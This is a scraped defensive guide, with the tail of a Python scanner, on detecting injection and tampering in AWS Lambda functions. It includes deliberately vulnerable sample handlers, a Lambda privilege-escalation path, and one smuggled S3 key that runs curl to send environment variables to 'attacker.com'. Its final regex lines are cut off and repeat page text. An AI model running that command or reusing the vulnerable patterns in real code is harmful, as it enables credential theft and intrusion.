req_params = ct_event.get(\"requestParameters\", {})\n\n finding = {\n \"event_name\": event_name,\n \"time\": event[\"EventTime\"].isoformat(),\n \"user\": event.get(\"Username\"),\n \"source_ip\": ct_event.get(\"sourceIPAddress\"),\n \"user_agent\": ct_event.get(\"userAgent\", \"\")[:100],\n \"function_name\": req_params.get(\"functionName\"),\n \"suspicious\": False,\n \"indicators\": [],\n }\n\n # Flag suspicious patterns\n user_agent = ct_event.get(\"userAgent\", \"\")\n if \"console.amazonaws.com\" not in user_agent and \"cloudformation\" not in user_agent.lower():\n if \"UpdateFunctionCode\" in event_name:\n finding[\"suspicious\"] = True\n finding[\"indicators\"].append(\"Function code updated outside console/CloudFormation\")\n\n # Check for role changes\n if \"role\" in req_params and \"UpdateFunctionConfiguration\" in event_name:\n finding[\"suspicious\"] = True\n finding[\"indicators\"].append(f\"Execution role changed to: {req_params['role']}\")\n\n # Check for layer additions\n if \"layers\" in req_params and \"UpdateFunctionConfiguration\" in event_name:\n finding[\"suspicious\"] = True\n finding[\"indicators\"].append(f\"Layers modified: {req_params['layers']}\")\n\n # Off-hours modification\n event_hour = event[\"EventTime\"].hour\n if event_hour \u003c 6 or event_hour > 22:\n finding[\"indicators\"].append(f\"Modification at unusual hour: {event_hour}:00 UTC\")\n\n findings.append(finding)\n\n except ClientError as e:\n logger.warning(\"CloudTrail query failed for %s: %s\", event_name, e)\n\n return findings\n\n\ndef check_function_url_security(lambda_client, functions):\n \"\"\"Check Lambda function URLs for insecure authentication.\"\"\"\n findings = []\n for func in functions:\n if func.get(\"has_function_url\") and func.get(\"function_url_auth\") == \"NONE\":\n findings.append({\n \"type\": \"unauthenticated_function_url\",\n \"function_name\": func[\"function_name\"],\n \"severity\": \"high\",\n \"description\": \"Function URL has AuthType=NONE - publicly accessible without authentication\",\n })\n return findings\n\n\ndef generate_report(functions, event_sources, injection_findings, layer_findings,\n escalation_findings, cloudtrail_findings, url_findings):\n \"\"\"Generate comprehensive serverless injection detection report.\"\"\"\n\n all_findings = []\n for f in injection_findings:\n f[\"category\"] = \"code_injection\"\n all_findings.append(f)\n for f in layer_findings:\n f[\"category\"] = \"layer_security\"\n all_findings.append(f)\n for f in escalation_findings:\n f[\"category\"] = \"privilege_escalation\"\n all_findings.append(f)\n for f in cloudtrail_findings:\n if f.get(\"suspicious\"):\n f[\"category\"] = \"suspicious_modification\"\n f[\"severity\"] = \"high\"\n all_findings.append(f)\n for f in url_findings:\n f[\"category\"] = \"function_url\"\n all_findings.append(f)\n\n critical = [f for f in all_findings if f.get(\"severity\") == \"critical\"]\n high = [f for f in all_findings if f.get(\"severity\") == \"high\"]\n\n report = {\n \"report_type\": \"Serverless Function Injection Assessment\",\n \"generated_at\": datetime.now(timezone.utc).isoformat(),\n \"summary\": {\n \"functions_analyzed\": len(functions),\n \"event_source_mappings\": len(event_sources),\n \"total_findings\": len(all_findings),\n \"critical_findings\": len(critical),\n \"high_findings\": len(high),\n \"injection_sinks_found\": len(injection_findings),\n \"layer_issues\": len(layer_findings),\n \"escalation_paths\": len(escalation_findings),\n \"suspicious_modifications\": len([f for f in cloudtrail_findings if f.get(\"suspicious\")]),\n },\n \"findings\": all_findings,\n \"functions\": functions,\n \"event_source_mappings\": event_sources,\n \"cloudtrail_events\": cloudtrail_findings,\n }\n\n return report\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Serverless Function Injection Detection Agent\")\n parser.add_argument(\"--region\", default=\"us-east-1\", help=\"AWS region\")\n parser.add_argument(\"--functions\", nargs=\"+\", help=\"Specific function names to scan (default: all)\")\n parser.add_argument(\"--scan-code\", action=\"store_true\", help=\"Download and scan function code for injection sinks\")\n parser.add_argument(\"--cloudtrail-days\", type=int, default=7, help=\"Days of CloudTrail history to search\")\n parser.add_argument(\"--output\", default=\"serverless_injection_report.json\", help=\"Output report file\")\n args = parser.parse_args()\n\n session = boto3.Session(region_name=args.region)\n lambda_client = session.client(\"lambda\")\n iam_client = session.client(\"iam\")\n cloudtrail_client = session.client(\"cloudtrail\")\n\n logger.info(\"Starting serverless function injection detection in %s\", args.region)\n\n # Step 1: Enumerate functions\n all_functions = enumerate_functions(lambda_client)\n if args.functions:\n all_functions = [f for f in all_functions if f[\"function_name\"] in args.functions]\n\n # Step 2: Get event source mappings\n event_sources = get_event_source_mappings(lambda_client)\n\n # Step 3: Scan code for injection patterns\n injection_findings = []\n if args.scan_code:\n work_dir = tempfile.mkdtemp(prefix=\"lambda_scan_\")\n try:\n for func in all_functions:\n if func[\"runtime_family\"] in INJECTION_PATTERNS:\n logger.info(\"Scanning %s (%s)\", func[\"function_name\"], func[\"runtime\"])\n findings = download_and_scan_function(\n lambda_client, func[\"function_name\"],\n func[\"runtime_family\"], work_dir\n )\n injection_findings.extend(findings)\n finally:\n shutil.rmtree(work_dir, ignore_errors=True)\n\n # Step 4: Audit layers\n layer_findings = audit_layers(lambda_client, all_functions)\n\n # Step 5: Detect privilege escalation paths\n escalation_findings = detect_privilege_escalation_paths(iam_client, all_functions)\n\n # Step 6: Check CloudTrail for suspicious modifications\n cloudtrail_findings = check_cloudtrail_for_modifications(cloudtrail_client, args.cloudtrail_days)\n\n # Step 7: Check function URL security\n url_findings = check_function_url_security(lambda_client, all_functions)\n\n # Generate report\n report = generate_report(\n all_functions, event_sources, injection_findings, layer_findings,\n escalation_findings, cloudtrail_findings, url_findings\n )\n\n with open(args.output, \"w\") as f:\n json.dump(report, f, indent=2, default=str)\n logger.info(\"Report saved to %s\", args.output)\n\n summary = report[\"summary\"]\n logger.info(\n \"Assessment complete: %d functions, %d findings (%d critical, %d high)\",\n summary[\"functions_analyzed\"],\n summary[\"total_findings\"],\n summary[\"critical_findings\"],\n summary[\"high_findings\"],\n )\n\n if summary[\"critical_findings\"] > 0:\n logger.warning(\"CRITICAL FINDINGS DETECTED:\")\n for f in report[\"findings\"]:\n if f.get(\"severity\") == \"critical\":\n logger.warning(\" [%s] %s: %s\", f.get(\"category\", \"\"), f.get(\"function_name\", \"\"), f.get(\"sink\", f.get(\"description\", \"\")))\n\n return 0 if summary[\"critical_findings\"] == 0 else 1\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","content_type":"text/x-python; charset=utf-8","language":"python","size":26531,"content_sha256":"5bb0aacb3f512a997f6f024e08902feac3c8d0d5f400e01c60122bc71ea07551"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Detecting Serverless Function Injection","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"When to Use","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Auditing Lambda/Cloud Functions for code injection vulnerabilities where unsanitized event data flows into dangerous runtime functions (","type":"text"},{"text":"eval","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"exec","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"child_process.exec","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"os.system","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Investigating incidents where an attacker modified function code or layers to establish persistence or exfiltrate data from the serverless environment","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detecting privilege escalation paths where an adversary with ","type":"text"},{"text":"lambda:UpdateFunctionCode","type":"text","marks":[{"type":"code_inline"}]},{"text":" and ","type":"text"},{"text":"iam:PassRole","type":"text","marks":[{"type":"code_inline"}]},{"text":" can assume higher-privilege execution roles","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Analyzing event source poisoning attacks where malicious payloads are injected through S3 object uploads, SQS messages, DynamoDB stream records, or API Gateway requests that trigger function execution","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Building detection rules for SOC teams monitoring serverless workloads for unauthorized function modifications, layer additions, and suspicious invocation patterns","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Do not use","type":"text","marks":[{"type":"strong"}]},{"text":" for load testing or denial-of-service simulation against serverless functions, for testing against production functions processing live customer data without explicit authorization, or for modifying IAM policies in shared accounts without change management approval.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Prerequisites","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"AWS account access with read permissions for Lambda, CloudTrail, IAM, CloudWatch Logs, and EventBridge","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"AWS CLI v2 configured with appropriate credentials and region","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"CloudTrail enabled with Data Events for Lambda (captures ","type":"text"},{"text":"Invoke","type":"text","marks":[{"type":"code_inline"}]},{"text":" events) and Management Events (captures ","type":"text"},{"text":"UpdateFunctionCode","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"UpdateFunctionConfiguration","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"CreateFunction","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python 3.9+ with ","type":"text"},{"text":"boto3","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"bandit","type":"text","marks":[{"type":"code_inline"}]},{"text":" (Python SAST), and ","type":"text"},{"text":"semgrep","type":"text","marks":[{"type":"code_inline"}]},{"text":" for static analysis","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Access to function source code or deployment packages for static analysis","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"CloudWatch Logs Insights access for querying Lambda execution logs","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Workflow","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 1: Enumerate the Serverless Attack Surface","type":"text"}]},{"type":"paragraph","content":[{"text":"Map all Lambda functions and their event source triggers to understand injection entry points:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"List all Lambda functions and their configurations","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws lambda list-functions --query 'Functions[*].[FunctionName,Runtime,Role,Handler,Layers]' --output table","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Map event source mappings","type":"text","marks":[{"type":"strong"}]},{"text":": Each event source mapping is a potential injection entry point where untrusted data enters the function:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws lambda list-event-source-mappings --output json | \\\n jq '.EventSourceMappings[] | {Function: .FunctionArn, Source: .EventSourceArn, State: .State}'","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Identify API Gateway triggers","type":"text","marks":[{"type":"strong"}]},{"text":": API Gateway routes pass HTTP request data (headers, query strings, body, path parameters) directly into the Lambda event object:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws apigateway get-rest-apis --query 'items[*].[id,name]' --output table","type":"text"}]},{"type":"paragraph","content":[{"text":"For each API, enumerate resources and methods to identify which Lambda functions receive user-controlled HTTP input.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Identify S3 event triggers","type":"text","marks":[{"type":"strong"}]},{"text":": S3 bucket notifications can trigger Lambda with attacker-controlled object keys and metadata:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws s3api get-bucket-notification-configuration --bucket \u003cbucket-name>","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Catalog function environment variables","type":"text","marks":[{"type":"strong"}]},{"text":": Secrets in environment variables are exposed if an attacker achieves code execution inside the function:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws lambda get-function-configuration --function-name \u003cname> \\\n --query 'Environment.Variables' --output json","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Identify overprivileged execution roles","type":"text","marks":[{"type":"strong"}]},{"text":": Functions with ","type":"text"},{"text":"*","type":"text","marks":[{"type":"code_inline"}]},{"text":" resource permissions or administrative policies are high-value escalation targets:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws iam list-attached-role-policies --role-name \u003clambda-exec-role>\naws iam list-role-policies --role-name \u003clambda-exec-role>","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 2: Static Analysis for Injection Sinks","type":"text"}]},{"type":"paragraph","content":[{"text":"Scan function code for dangerous patterns that allow injected event data to execute as code or commands:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Download function deployment packages","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws lambda get-function --function-name \u003cname> --query 'Code.Location' --output text | xargs curl -o function.zip\nunzip function.zip -d function_code/","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python injection sinks","type":"text","marks":[{"type":"strong"}]},{"text":" (Lambda Python runtimes): Search for functions that execute strings as code:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"python"},"content":[{"text":"# DANGEROUS: Direct eval/exec of event data\neval(event['expression']) # Code injection via eval\nexec(event['code']) # Arbitrary code execution\nos.system(event['command']) # OS command injection\nsubprocess.call(event['cmd'], shell=True) # Shell injection\nos.popen(event['input']) # Command injection\npickle.loads(event['data']) # Deserialization attack\nyaml.load(event['config']) # YAML deserialization (unsafe loader)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Node.js injection sinks","type":"text","marks":[{"type":"strong"}]},{"text":" (Lambda Node.js runtimes):","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"javascript"},"content":[{"text":"// DANGEROUS: Direct execution of event data\neval(event.expression); // Code injection\nnew Function(event.code)(); // Dynamic function creation\nchild_process.exec(event.command); // OS command injection\nchild_process.execSync(event.cmd); // Synchronous command injection\nvm.runInNewContext(event.script); // Sandbox escape potential\nrequire('child_process').exec(event.input); // Import-and-execute pattern","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Run Semgrep with serverless rules","type":"text","marks":[{"type":"strong"}]},{"text":": Use purpose-built rules that detect event data flowing into injection sinks:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"semgrep --config \"p/owasp-top-ten\" --config \"p/command-injection\" \\\n --config \"p/python-security\" function_code/ --json --output semgrep_results.json","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Run Bandit for Python functions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"bandit -r function_code/ -f json -o bandit_results.json \\\n -t B102,B301,B307,B602,B603,B604,B605,B606,B607","type":"text"}]},{"type":"paragraph","content":[{"text":"These test IDs specifically target ","type":"text"},{"text":"exec","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"pickle","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"eval","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"subprocess","type":"text","marks":[{"type":"code_inline"}]},{"text":" with ","type":"text"},{"text":"shell=True","type":"text","marks":[{"type":"code_inline"}]},{"text":", and other injection-relevant patterns.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Custom pattern detection","type":"text","marks":[{"type":"strong"}]},{"text":": Search for indirect injection patterns where event data is concatenated into strings that are later executed:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"python"},"content":[{"text":"# Indirect injection: event data flows into SQL query string\nquery = f\"SELECT * FROM users WHERE id = '{event['userId']}'\"\ncursor.execute(query) # SQL injection\n\n# Indirect injection: event data flows into template rendering\ntemplate = event['template']\nrendered = jinja2.Template(template).render() # SSTI","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 3: Detect Event Source Poisoning","type":"text"}]},{"type":"paragraph","content":[{"text":"Analyze event sources for injection payloads that exploit how Lambda processes triggers:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"S3 event key injection","type":"text","marks":[{"type":"strong"}]},{"text":": When a Lambda function processes S3 events, the object key from the event record can contain injection payloads. An attacker uploads an object with a malicious key name:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"python"},"content":[{"text":"# Vulnerable Lambda handler\ndef handler(event, context):\n bucket = event['Records'][0]['s3']['bucket']['name']\n key = event['Records'][0]['s3']['object']['key']\n # VULNERABLE: key is attacker-controlled\n os.system(f\"aws s3 cp s3://{bucket}/{key} /tmp/file\")","type":"text"}]},{"type":"paragraph","content":[{"text":"Attack: Upload an object with key ","type":"text"},{"text":"; curl http://attacker.com/exfil?data=$(env)","type":"text","marks":[{"type":"code_inline"}]},{"text":" to inject a command through the S3 event.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SQS message body injection","type":"text","marks":[{"type":"strong"}]},{"text":": Lambda processes SQS messages where the body contains attacker-controlled data:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"python"},"content":[{"text":"# Vulnerable Lambda handler\ndef handler(event, context):\n for record in event['Records']:\n message = json.loads(record['body'])\n # VULNERABLE: message content used in eval\n result = eval(message['formula'])","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"API Gateway header/parameter injection","type":"text","marks":[{"type":"strong"}]},{"text":": HTTP request data passes through API Gateway into the Lambda event:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"python"},"content":[{"text":"# Vulnerable Lambda handler\ndef handler(event, context):\n user_agent = event['headers']['User-Agent']\n # VULNERABLE: header value used in shell command\n subprocess.run(f\"echo {user_agent} >> /tmp/access.log\", shell=True)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"DynamoDB Stream record injection","type":"text","marks":[{"type":"strong"}]},{"text":": Modified DynamoDB items trigger Lambda with the new record values. If an attacker can write to the table, they control the event data:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"python"},"content":[{"text":"# Vulnerable Lambda handler\ndef handler(event, context):\n for record in event['Records']:\n new_image = record['dynamodb']['NewImage']\n config = new_image['config']['S']\n # VULNERABLE: DynamoDB record value used in exec\n exec(config)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detection via CloudWatch Logs Insights","type":"text","marks":[{"type":"strong"}]},{"text":": Query for evidence of injection attempts in function execution logs:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"fields @timestamp, @message\n| filter @message like /(?i)(eval|exec|os\\.system|child_process|subprocess|import os)/\n| filter @message like /(?i)(error|exception|traceback|syntax)/\n| sort @timestamp desc\n| limit 100","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 4: Detect Malicious Lambda Layer Injection","type":"text"}]},{"type":"paragraph","content":[{"text":"Identify unauthorized Lambda layers that intercept function execution or exfiltrate data:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Audit current layer attachments","type":"text","marks":[{"type":"strong"}]},{"text":": List all functions and their layer versions to identify unexpected additions:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws lambda list-functions --query 'Functions[*].[FunctionName,Layers[*].Arn]' --output json","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detect layer modification events in CloudTrail","type":"text","marks":[{"type":"strong"}]},{"text":": Query for ","type":"text"},{"text":"UpdateFunctionConfiguration","type":"text","marks":[{"type":"code_inline"}]},{"text":" events that add or change layers:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws cloudtrail lookup-events \\\n --lookup-attributes AttributeKey=EventName,AttributeValue=UpdateFunctionConfiguration \\\n --start-time \"2026-03-12T00:00:00Z\" \\\n --end-time \"2026-03-19T23:59:59Z\" \\\n --query 'Events[*].[EventTime,Username,CloudTrailEvent]'","type":"text"}]},{"type":"paragraph","content":[{"text":"Parse the ","type":"text"},{"text":"CloudTrailEvent","type":"text","marks":[{"type":"code_inline"}]},{"text":" JSON to check if ","type":"text"},{"text":"Layers","type":"text","marks":[{"type":"code_inline"}]},{"text":" was modified in the request parameters.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Analyze layer contents","type":"text","marks":[{"type":"strong"}]},{"text":": Download and inspect layer packages for malicious code:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws lambda get-layer-version --layer-name \u003clayer-name> --version-number \u003cversion> \\\n --query 'Content.Location' --output text | xargs curl -o layer.zip\nunzip layer.zip -d layer_contents/\n# Search for suspicious patterns\ngrep -rn \"urllib\\|requests\\|http\\|socket\\|exfil\\|base64\\|subprocess\" layer_contents/","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Layer hijacking indicators","type":"text","marks":[{"type":"strong"}]},{"text":": A malicious layer can override the function's runtime behavior by placing files in the runtime's search path:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python: Layer code in ","type":"text"},{"text":"/opt/python/","type":"text","marks":[{"type":"code_inline"}]},{"text":" is imported before the function's own modules","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Node.js: Layer code in ","type":"text"},{"text":"/opt/nodejs/node_modules/","type":"text","marks":[{"type":"code_inline"}]},{"text":" overrides function dependencies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"A layer providing a modified ","type":"text"},{"text":"boto3","type":"text","marks":[{"type":"code_inline"}]},{"text":" package can intercept all AWS API calls, log credentials, and forward requests to an attacker-controlled endpoint","type":"text"}]}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"CloudTrail detection query for layer changes","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"json"},"content":[{"text":"{\n \"source\": [\"aws.lambda\"],\n \"detail-type\": [\"AWS API Call via CloudTrail\"],\n \"detail\": {\n \"eventName\": [\"UpdateFunctionConfiguration20150331v2\", \"PublishLayerVersion20181031\"],\n \"errorCode\": [{\"exists\": false}]\n }\n}","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 5: Detect IAM Privilege Escalation via Lambda","type":"text"}]},{"type":"paragraph","content":[{"text":"Identify escalation paths where attackers modify functions to assume higher-privilege roles:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"The Lambda privilege escalation pattern","type":"text","marks":[{"type":"strong"}]},{"text":": An attacker with ","type":"text"},{"text":"lambda:UpdateFunctionCode","type":"text","marks":[{"type":"code_inline"}]},{"text":" and ","type":"text"},{"text":"iam:PassRole","type":"text","marks":[{"type":"code_inline"}]},{"text":" permissions can:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Identify a Lambda function with a high-privilege execution role (e.g., AdministratorAccess)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Modify the function's code to call ","type":"text"},{"text":"sts:GetCallerIdentity","type":"text","marks":[{"type":"code_inline"}]},{"text":" or perform privileged actions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Invoke the function, which executes with the high-privilege role","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exfiltrate the role's temporary credentials from the function's environment variables (","type":"text"},{"text":"AWS_ACCESS_KEY_ID","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"AWS_SECRET_ACCESS_KEY","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"AWS_SESSION_TOKEN","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detect UpdateFunctionCode events","type":"text","marks":[{"type":"strong"}]},{"text":": Monitor CloudTrail for function code modifications:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws cloudtrail lookup-events \\\n --lookup-attributes AttributeKey=EventName,AttributeValue=UpdateFunctionCode20150331v2 \\\n --start-time \"2026-03-12T00:00:00Z\" \\\n --query 'Events[*].[EventTime,Username,Resources[0].ResourceName]' --output table","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detect PassRole to Lambda","type":"text","marks":[{"type":"strong"}]},{"text":": ","type":"text"},{"text":"iam:PassRole","type":"text","marks":[{"type":"code_inline"}]},{"text":" is required to attach a different execution role to a function. Monitor for this:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"# CloudWatch Logs Insights on CloudTrail logs\nfields eventTime, userIdentity.arn, requestParameters.functionName, requestParameters.role\n| filter eventName = \"UpdateFunctionConfiguration20150331v2\"\n| filter ispresent(requestParameters.role)\n| sort eventTime desc","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detect credential exfiltration from Lambda","type":"text","marks":[{"type":"strong"}]},{"text":": A compromised function may call STS or create new IAM entities:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"fields eventTime, userIdentity.arn, eventName, sourceIPAddress\n| filter userIdentity.arn like /.*:assumed-role\\/.*lambda.*/\n| filter eventName in [\"GetCallerIdentity\", \"CreateUser\", \"AttachUserPolicy\",\n \"CreateAccessKey\", \"AssumeRole\", \"PutUserPolicy\"]\n| sort eventTime desc","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"EventBridge rule for real-time alerting","type":"text","marks":[{"type":"strong"}]},{"text":": Create an EventBridge rule to trigger an SNS alert whenever function code is modified:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"json"},"content":[{"text":"{\n \"source\": [\"aws.lambda\"],\n \"detail-type\": [\"AWS API Call via CloudTrail\"],\n \"detail\": {\n \"eventName\": [\n \"UpdateFunctionCode20150331v2\",\n \"UpdateFunctionConfiguration20150331v2\",\n \"CreateFunction20150331\"\n ],\n \"errorCode\": [{\"exists\": false}]\n }\n}","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 6: Implement Runtime Injection Prevention","type":"text"}]},{"type":"paragraph","content":[{"text":"Deploy runtime protection controls to prevent injection at execution time:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Input validation at handler entry","type":"text","marks":[{"type":"strong"}]},{"text":": Validate and sanitize all event data before processing:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"python"},"content":[{"text":"import re\nimport json\nfrom functools import wraps\n\nSAFE_PATTERNS = {\n 'userId': re.compile(r'^[a-zA-Z0-9\\-]{1,64}

Detecting Serverless Function Injection When to Use - Auditing Lambda/Cloud Functions for code injection vulnerabilities where unsanitized event data flows into dangerous runtime functions ( , , , ) - Investigating incidents where an attacker modified function code or layers to establish persistence or exfiltrate data from the serverless environment - Detecting privilege escalation paths where an adversary with and can assume higher-privilege execution roles - Analyzing event source poisoning attacks where malicious payloads are injected through S3 object uploads, SQS messages, DynamoDB strea…

),\n 'email': re.compile(r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}

Detecting Serverless Function Injection When to Use - Auditing Lambda/Cloud Functions for code injection vulnerabilities where unsanitized event data flows into dangerous runtime functions ( , , , ) - Investigating incidents where an attacker modified function code or layers to establish persistence or exfiltrate data from the serverless environment - Detecting privilege escalation paths where an adversary with and can assume higher-privilege execution roles - Analyzing event source poisoning attacks where malicious payloads are injected through S3 object uploads, SQS messages, DynamoDB strea…

),\n 'action': re.compile(r'^(get|list|create|update|delete)

Detecting Serverless Function Injection When to Use - Auditing Lambda/Cloud Functions for code injection vulnerabilities where unsanitized event data flows into dangerous runtime functions ( , , , ) - Investigating incidents where an attacker modified function code or layers to establish persistence or exfiltrate data from the serverless environment - Detecting privilege escalation paths where an adversary with and can assume higher-privilege execution roles - Analyzing event source poisoning attacks where malicious payloads are injected through S3 object uploads, SQS messages, DynamoDB strea…

